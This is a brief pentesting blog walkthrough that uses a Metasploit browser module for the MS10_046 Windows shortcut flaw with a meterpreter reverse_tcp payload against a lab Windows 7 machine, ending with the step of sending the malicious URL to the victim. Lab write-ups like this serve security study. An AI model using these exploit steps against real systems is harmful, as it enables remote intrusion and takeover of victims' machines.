- Windows 7 Exploit with ms10_046
Vulnerability : MS10_046
PayLoad : windows/meterpreter/reverse_tcp
Platforms : Windows
Architectures : x86
Target : 192.168.0.2 ( Windows 7 Home Premium K sp1 )
Attacker : 192.168.233.131 ( Windows7 Ultimate sp1 )
- Process -
This time we will use vuln called MS10_046
MS10_046 :
Shell Link Code Execution , Using specially controled go-to-icon, Executing Remote code is allowed by this vuln
Load module..
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
payload : windows/merterpreter/reverse_tcp
Cmd : set payload windows/meterpreter/reverse_tcp
Cmd : show options
u can check options needed to exploit
SRVHOST attacker's ip // my ip
LHOST -> my ip
Exploit !!!!
OK! send that url to victim
- End
'Research > Pentesting' 카테고리의 다른 글
[Pentesting] Windows exploit with Word Macro (0) | 2016.08.04 |
---|---|
[Docs] Cracking Windows XP/7/8 Account Password (0) | 2014.04.27 |
[Pentesting] XP sp3 Remote Exploit with ms08_067 (0) | 2014.04.27 |
[Pentesting] XP sp3 Exploit with Backdoor (0) | 2014.04.27 |
[Pentesting] Meterpreter Command List (0) | 2014.04.27 |